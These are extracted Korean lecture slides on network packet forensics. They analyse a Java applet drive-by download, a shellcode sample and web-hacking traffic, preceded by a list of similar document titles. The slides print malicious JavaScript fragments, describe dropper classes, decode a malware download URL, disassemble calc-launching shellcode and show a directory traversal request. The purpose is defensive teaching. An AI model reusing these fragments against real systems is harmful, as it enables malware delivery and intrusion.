Vehicular Communications

Similar documents
Secure Programming Lecture1 : Introduction

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

Microsoft Word - Static analysis of Shellcode.doc

Secure Programming Lecture1 : Introduction

1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과

#WI DNS DDoS 공격악성코드분석

*2008년1월호진짜

var answer = confirm(" 확인이나취소를누르세요."); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write(" 확인을눌렀습니다."); else { document.write(" 취소를눌렀습니다.");

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

Network seminar.key

Secure Programming Lecture1 : Introduction

슬라이드 1

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

Microsoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

로거 자료실

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

ActFax 4.31 Local Privilege Escalation Exploit

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

Deok9_Exploit Technique

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

PowerPoint Template

PowerPoint 프레젠테이션

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호

슬라이드 1

ìœ€íŁ´IP( _0219).xlsx

Microsoft Word - poc_script1.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

Chapter 1

<4D F736F F F696E74202D20C1A63236C0E520BED6C7C3B8B428B0ADC0C729205BC8A3C8AF20B8F0B5E55D>

ISP and CodeVisionAVR C Compiler.hwp

PowerPoint Template

설명 Description 상세정보 네이버에서운영하는서비스중하나인쥬니어네이버 ( 이하쥬니버 ) 에서는쥬니버서비스와 관련하여도움을주기위한 [ 그림 1] 과같은플래시애플리케이션이서비스되고있다.[2] [ 그림 1] 쥬니어네이버에서서비스중인쥬니버도우미플래시애플리케이션 해당플래

Microsoft PowerPoint - web-part01-ch05-함수.pptx

게시판 스팸 실시간 차단 시스템

쉽게 풀어쓴 C 프로그래밍

The Pocket Guide to TCP/IP Sockets: C Version

제20회_해킹방지워크샵_(이재석)

PowerPoint 프레젠테이션

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

혼자서일을다하는 JSP. 이젠일을 Servlet 과나눠서한다. JSP와서블릿의표현적인차이 - JSP는 <html> 내에서자바를사용할수있는수단을제공한다. - 서블릿은자바내에서 <html> 을작성할수있는수단을제공한다. - JSP나서블릿으로만웹페이지를작성하면자바와다양한코드가

Microsoft PowerPoint - web-part03-ch20-XMLHttpRequest기본.pptx

임베디드시스템설계강의자료 6 system call 2/2 (2014 년도 1 학기 ) 김영진 아주대학교전자공학과

Microsoft PowerPoint - Supplement-03-TCP Programming.ppt [호환 모드]

Microsoft Word - src.doc

BEA_WebLogic.hwp

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

Microsoft PowerPoint - aj-lecture1.ppt [호환 모드]

표준프레임워크 Nexus 및 CI 환경구축가이드 Version 3.8 Page 1

Microsoft PowerPoint - 03-TCP Programming.ppt

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

adfasdfasfdasfasfadf

제목 레이아웃

본문서는 Syngress 의 Writing Security Tools and Exploits Chap11 을요약정리한 것입니다. 참고로 Chap 10 ~ 12 까지가 Metasploit 에대한설명입니다. Metasploit Framework 활용법 1. Metasplo

작성자 : 기술지원부 김 삼 수

bn2019_2

목 차 1. 개 요 배경 요약 정보 대상시스템 원리 공격 기법 및 기본 개념 Heap Spray Font 공 격..

기존에 Windchill Program 이 설치된 Home Directory 를 선택해준다. 프로그램설치후설치내역을확인해보면 Adobe Acrobat 6.0 Support 내역을확인할수 있다.

UDP Flooding Attack 공격과 방어

PowerPoint Presentation

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó

일반적인 네트워크의 구성은 다음과 같다

10 강. 쉘스크립트 l 쉘스크립트 Ÿ 쉘은명령어들을연속적으로실행하는인터프리터환경을제공 Ÿ 쉘스크립트는제어문과변수선언등이가능하며프로그래밍언어와유사 Ÿ 프로그래밍언어와스크립트언어 -프로그래밍언어를사용하는경우소스코드를컴파일하여실행가능한파일로만들어야함 -일반적으로실행파일은다

PowerPoint 프레젠테이션

0. 들어가기 전

Adobe Flash 취약점 분석 (CVE )

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

ㅇ악성코드 분석

Microsoft Word - GOM-StackOverFlow.doc

POC "Power of Community" 이민우 (lwmr)

untitled

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F32C2F7BDC32E >

목차 1. 소개... 3 가. BOF란?... 3 나. 윈도우 BOF 개발환경및사용툴 Shellcode 작성하기... 4 가. cmd 쉘 ) 소스코드작성 ) 디스어셈블리 ) 어셈블리코드편집 간단

Android Master Key Vulnerability

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

SBR-100S User Manual

API 매뉴얼

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2.

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부

SKINFOSEC_TECH_005_China Bot_가칭_ 악성코드 분석_v0.3.doc

5th-KOR-SANGFOR NGAF(CC)

HTML5 웹프로그래밍 입문-개정판

SOFTBASE XFRAME DEVELOPMENT GUIDE SERIES HTML 연동가이드 서울특별시구로구구로 3 동한신 IT 타워 1215 호 Phone Fax Co

2017 년악성코드은닉사이트탐지동향보고서 ( 상반기 ) 악성코드은닉사이트탐지 동향보고서 17 년상반기 1

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation

#HNS-WI 금융권및포털사이트이용자대상악성코드및공격기법분석 (v0.1 공개버전 )

쉽게 풀어쓴 C 프로그래밍

Transcription:

Network Security and Policy 2014. 04. 28 Jae Dong Lee SeoulTech (jdlee731@seoultech.ac.kr)

Table of Contents Java applet malicious code Packet Analyze Shell code Packet Analyze Web hacking Packet Analyze 2

자바애플릿악성코드패킷분석 Java applet malicious code Packet Analyze by wireshark

Java applet? 자바언어로작성된소프트웨어 애플릿이라고명명 크기가작아서네트워크전송에적합 World Wide Web 을사용하여배포가능 자바애플릿은사전에컴파일하여웹서버에등록 웹에서사용하는표준데이터형식인 HTML 로작성한문서에애플릿이라는태그를사용하여자바애플릿을지정 자바애플릿을동작시키는데는자바가상머신을내장한웹브라우저가필요 브라우저는불러내온문서속에애플릿이라는태그가있으면, 지정된자바애플릿을웹서버로부터내려받아실행 최근에애플릿을이용하여사용자에게악성코드를감염시키는사례가발생하고있다. 웹페이지에숨겨진자바애플릿을통해악성코드가감염되는과정과해당코드를분석하는과정을수행 4

Java applet malicious code analyze Chapter_12.pcap [statistics] [conversations] 5

Java applet malicious code analyze [Follow Stream] 을통해각세션별분석 6

1st session function ararata(reem, aanpry){ reem.replace(/r00ts/g,aanpry) } 7

2nd session HTTP 를암호화한 HTTPS( 암호화상태라내용無 ) 8

3rd session 특정페이지에접속을시도 ( 서버는존재하지않는페이지로응답 404 error) 9

4th session(1/6) 자바실행파일인 sdfg.jar 를요청하여다운 10

4th session(2/6) Sdfg.jar 파일을추출해내기위해 ~PK( 시그니처 ) 윗부분제거후저장 11

4th session(3/6) * 각클래스파일은 JAD 로디컴파일하여본다. 파일 Applet.class LoadX.class PX.class 역할 Data 및 cc 라는파라미터값을외부에서입력받고, 두번째클래스인 LoadX.class 를로딩하는역할 전달받은 data 와 cc 라는파라미터를 PX,class 로전달하고, PX.class 를로딩하는역할 전달받은 data 는악성코드가존재하는도메인을 cc 는악성코드개수를의미하며, 해당값을이용하여사용자의임시디렉토리에악성코드 exe 를다운로드시키는역할 12

4th session(4/6) - Applet.class getparameter 는사용자로부터입력받기위한함수이며, 입력받은 data 와 cc 값을 LoadX 클래스의 bootstrappayload 로전달 13

4th session(5/6) - LoaderX.class bootstrappayload 메소드의파라미터 string s, string s1 은 Applet.class 에서전달되온 data 및 cc 값이전달 Inputstream 으로 /myf/y/px.class 파일을 read data 및 cc 파라미터값을 PX.class 로전달 14

4th session(6/6) - PX.class System.getProperty( java.io.tmpdir ) 를통해 c:\windows\tmp\ 밑에악성코드생성 악성코드는 Runtime.getRuntime().exec() 를통해실행 15

5 th session 자바실행파일인 q.jar 를다운후추출 ( 추출과정동일 ) 16

5 th session - Save as 를통해추출한파일을 HxD 를통하여시그니처앞부분은제거한다..JAR 파일의압축을푼다. JAD( 자바디컴파일러 ) 로 open 한다. 파일 Main.class AppletPanel.class 역할 사용자의 OS 및자바버전확인및파라미터, s, s1, s2 를 ApplicationPanel 로전달하는역할 Data 및 cc 라는파라미터값을외부에서입력받고, 두번째클래스인 LoadX.class 를로딩하는역할 17

5 th session Main.class 파라미터 s, s1, s2 를 ApplicationPanel.class 로전달 18

6 th session MZ 는 exe 파일의 Magic Number(4D 5A) UPX 로패킹되어있음을알수있음 19

자바애플릿악성코드패킷분석 Java applet malicious code Packet Analyze by NetworkMiner

NetworkMiner 21

NetworkMiner 1. GET / true.php 접속 2. GET / xxx.xxx 자바스크립트함수가보임 3. HTTPS 접속 접속 4. GET /favicon.ico 접속그러나 404 리터 5. GET / sdfg.jar sdfg.jar 다운로드 6. GET /g.jar g.jar 다운로드 22

NetworkMiner 7. GET //loading.php?spl=javadnw&j050006010 file.exe 다운로드 8. GET //loading.php?spl=javad0 HTTP/1.1 file.exe 다운로드 9. 444번포트로접속 10. GET /11111/gate.php 접속 23

NetworkMiner true.php.html 을선택후 [open folder] 24

NetworkMiner true.php.html Line 3 자바스크립트로특정페이지를호출 (xxx.xxx) Line 15 난독화 QYDCtrO3jhsZAwQE = eval Line 16 난독화 FMsXHWkm3otEzXWe = unescape 25

NetworkMiner true.php.html & xxx Var aglavand = ararata(bbsa, VsSdAy); Aglavand = unescape(aglavand); ); reem.replace(/r00ts/g,aanpry) reem.replace(/r00ts/g,%) 26

NetworkMiner true.php.html True.php.html 에담겨있는인코딩된코드 27

NetworkMiner true.php.html r00ts 문자열을 % 로변환 28

NetworkMiner 인코딩된코드디코딩 해당코드를 2 회디코드 (http://meyerweb.com/eric/tools/dencoder/) 클래스 ID 확인 PDF 관련버전조건에따른분기 (http://nrtjo.eu 에접속하는코드 ) 29

NetworkMiner QYDCtrO3jhsZAwQE('v'+'ar p'+'w'+'dzra'+'a = d'+'oc'+'um'+fmsxhwkm3otezxwe('%65%6e%74')); eval('v'+'ar p'+'w'+'dzra'+'a = d'+'oc'+'um'+unescape('%65%6e%74')); eval('v'+'ar p'+'w'+'dzra'+'a = d'+'oc'+'um'+ent); var pwdzraa = document pwdzraa.write('<'+'s'+fmsxhwkm3otezxwe('%63%72%69%70%74%3 e')); document.write ('<'+'s'+unescape('%63%72%69%70%74%3e')); document.write ('<'+'s'+cript>); pwdzraa.write('v'+'ar kkrzbf2lwtu8qll0 = FMsXHWkm3otEzXWe(ag'+'la'+'va'+'nd); QYDCtrO3jhsZAwQE('+'kkrzbF2Lwtu8qLL0);</s'+'c'+'ri'+'p'+'t>'); 30

NetworkMiner pwdzraa.write('v'+'ar kkrzbf2lwtu8qll0 = FMsXHWkm3otEzXWe(ag'+'la'+'va'+'nd); document.write( var kkrzbf2lwtu8qll0 = unescape(aglavand); QYDCtrO3jhsZAwQE('+'kkrzbF2Lwtu8qLL0);</s'+'c'+'ri'+'p'+'t>'); eval(kkrzbf2lwtu8qll0);</script> ); 결과적으로이런코드가됨 <script> var aglavand = ararata(bbsa, VsSdAy); aglavand = unescape(aglavand); var kkrzbf2lwtu8qll0 = unescape(aglavand) eval(kkrzbf2lwtu8qll0);</script> ); </script> 31

NetworkMiner true.php.html kkrzbf2lwtu8qll0 는 aglavand 즉, ararata() 함수를실행하는코드임 해당함수를통해얻은정보는 PDF 버전에따라 nrtjo.eu 로접속한다는사실도알수있음 그러나웹사이트접속흔적에는 http://nrtjo.eu//pdf.?spl=ie 접속흔적이없으므로 PDF 버전에해당조건에맞지않음을알수있음. Sdfg.jar, q.jar 은 true.php 에서발생 32

NetworkMiner q.jar(main.class) 두번째 applet 의 16 진수형태로보이는부분분석 q.jar 의 main.class 내용 Hex to Ascii 변환 (http://www.asciitohex.com/) 687474703a2f2f6e72746a6f2e65752f2f6c6f6164696e672e706 8703f73706c3d6a617661646e7726(16 진수 ) http://nrtjo.eu//loading.php?spl=javadnw&(ascii) 33

Summary (1/2) 최초 ture.php 에접속 해당페이지에는 xxx.xxx 자바스크립트함수가포함된페이지를호출 #1 PDF 조건 x 실패 #2,3 코드에접속 34

Summary (2/2) True.php 에의해 sdfg.jar 와 q.jar 를다운 Jar 파일을통해 2 개의경로에서악성코드 file.exe 를다운 - http://nrtjo.eu/loading.php?spl=javadnw&j0500006010 - http://nrtjo.eu/loading.php?spl=javad0 악성코드는 file.exe 를통해원격지서버의 444 번포트로접속했을것으로추정 35

압축파일에대한바이러스테스트 Virus Test in Compressed File

Virus Test in Compressed File(1/3) 정상적인프로그램을 UPX 유틸로압축하여바이러스여부를평가할수있는사이트에서의반응확인 Notepad.exe 파일을 upx.exe 가잇는위치로복사 upx o [ 패킹할파일명 ] [ 패킹대상파일 ] 37

Virus Test in Compressed File(2/3) Virus total 에접속후 upx-notepad.exe 파일스캔 38

Virus Test in Compressed File(3/3) 일부스캔결과악성으로 평가되기도함. 39

쉘코드패킷분석 Shellcode Packet Analyse

Shell code In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. Shellcode is commonly written in machine code. 쉘코드의역할을메모리의특정공간의시스템명령을상주시키고, EIP 값등을변조하여원하는주소로분기하고시스템명령을실행하는것 패킷내에포함된쉘코드를어셈블리어코드로변환하여분석진행 41

42

1 st session GET 방식으로 update.alyac.co.kr:6969 로접속 알약의패턴업데이트요청으로보임 43

이것또한알약업데이트관련 2 nd session 44

3 rd and 4 th session [SYN] 요청은있으나, 서버응답은없음 45

5 th session 윈도우쉘 cmd.exe 문자열확인가능 Hex 값 90 은 NOP 를의미 보통버퍼오버플로우공격시공격문자열의길이를맞추기위해사용 46

5 th session 47

어셈블리어코드로변환하기위한 0x, 쉼표, 공백제거 48

Hex 어셈블리어코드 ( 시그윈에서 shellcodedecode.pl 을통해 )./ShellCodeDecode.pl < attack.txt > output.txt 바이너리 ( 실행파일 ) 코드를어셈블리코드로변환 (ndisasm) Ndisasm b output.txt more Jmp ShellCode StackExcute { WinExec() 함수실행 ExitProcess() 함수실행 } ShellCode { Call StackExcute Cmd.exe /c calc.exe } 2 1 1 2 Jmp ShellCode 명령을통해 ShellCode() 함수로이동 stackexcute() 함수호출 WinExec() 와 ExitProcess() 를통해계산기프로그램을실행하고종료 49

웹해킹패킷분석 Web hacking Packet Analyze

웹해킹은웹사이트취약점을공경하는기술적위협으로웹페이지를통하여권한이없는시스템에접근하거나데이터유출및파괴하는행위를일컫음. 검색엔진을이용한정보유출과웹애플리케이션프로그램취약점을이용한해킹등이있음. 포트스캔및웹해킹에사용되는여러접속패턴에대한성공여부를판단해보는방법학습 51

[statistics]-[conversations]-[port B] 로정렬 다양한포트에차례대로접근 포트스캔흔적 52

필터링정책만들기 (Expression 버튼클릭 ) 직접입력도가능 53

80 번포트를제외한포트스캔성공대상분석 tcp.dstport!= 80&tcp.srcport!= 80 80 번포트를제외한포트검색을위해목적지, 발신지포트에서 80 제외 tcp.flags.syn == 1 && tcp.flags.ack == 1 TCP 포트스캔접속의성공은 3 way handshaking 과정이있어야함 Syn 과 ack 플래그정보를입력 tcp.dstport!= 80&tcp.srcport!= 80 && tcp.flags.syn == 1 && tcp.flags.ack == 1 결과무포트스캔은실패로간주할수있음. 54

80 번포트를제외한포트스캔실패분석 오픈되어있지않은포트접속시 TCP 에서는 RESET 과 ACK 플래그를세팅하여응답함 tcp.dstport!= 80&& tcp.flags.reset == 1 && tcp.flags.ack == 1&& tcp.srcport!= 80 모든포트접속거절 55

80 번포트공격유형분석 tcp.dstport == 80 tcp.srcport == 80 56

80 번포트공격유형분석 공격유형확인 [Analyze] [Expert Info Composite] Chat (grey) : 플래그를가진 TCP Note (cyan): HTTP 404 와같은에러정보 Warn(yello): 연결문제와가은비정사적인정보 Error(red): 손상된패킷정보 57

324 번라인의공격문자열은 GET /..%5C..%5C..%5C.. 58

References 최경철, Network Packet Forensic, Secubook 바이러스토탈, Virustotal.org

Q & A